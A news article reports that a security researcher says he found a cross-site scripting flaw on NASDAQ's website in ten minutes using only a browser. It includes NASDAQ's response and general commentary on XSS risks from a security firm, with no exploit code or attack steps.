NASDAQ exchange’s website was hacked in only 10 minutes, according to recent reports, by a security expert using only the Firefox web browser to do so.
One Illia Kolochenko, the CEO of High-Bridge Tech in Switzerland, told the New York Daily News that his hacking attempt came after his previous advice regarding the security and vulnerability of the site went ignored.
Kolochenk affirms that this issue was the latest in the series of technology problems for exchanges.
Hacking into the system
Kolochencko was able to attain full access to nasdaq.com, the website of the stock market exchange, underlining the fact that the website could be easily hacked by anybody with the right know-how.
According to Kolochencko, a good hacker would be able to gain full access to the website in just a few days, and be able to whatever he or she wants with it. One example Kolochenko gave was that a hacker could easily write an official statement saying Facebook shares have dropped by 90% – a move which, of course, would cause havoc at the stock exchange.
Kolochenko himself was able to access the site in only 10 minutes, and all he needed to do it was a Firefox browser.
Not just able to manipulate content on the site itself, a hacker would be able to phish for information from users of the site, thus stealing personal information. This brings up the very real danger of identity theft.
Speaking on behalf of NASDAQ, a spokesperson told the Daily Mail:
“We work with leading security vendors and have a trained and professional team that evaluates all credible threats across our digital assets.
“We responded to his concerns immediately. We take all information security matters seriously.”
What went wrong?
The security experts at RandomStorm were able to provide some insight on this:
“Mr Kolochenk seems to have identified a Cross-Site Scripting (XSS) vulnerability in the Nasdaq.com web application. XSS is the most common vulnerability affecting web applications today. According to OWASP and other sources XSS is very widespread and easy to detect, from my experience in detecting and exploiting XSS vulnerabilities for RandomStorm clients, I agree.
“Although XSS is very wide spread and easy to detect that does not mean that it is not a serious issue. Depending on the type of XSS, it can be used to deface the web application, steal user’s authentication sessions, redirect user’s to phishing web sites and much more.
“Avram, a Web Application Security Engineer also working for RandomStorm, constantly finds XSS and other issues in many of the worlds most visited web applications as part of his bug bounty research.
“I think the main issue with what is being discussed here is that Nasdaq.com took so long to fix the XSS issue after it was reported to them,” the spokesperson continued, “because XSS is so widespread many web administrators have become complacent about it.
“Maybe they should consider starting their own bug bounty program and rewarding security researchers as so many other high profile companies have”.
An investigation into the matter at NASDAQ continues, though NASDAQ maintains that a close eye is kept on the website at all times.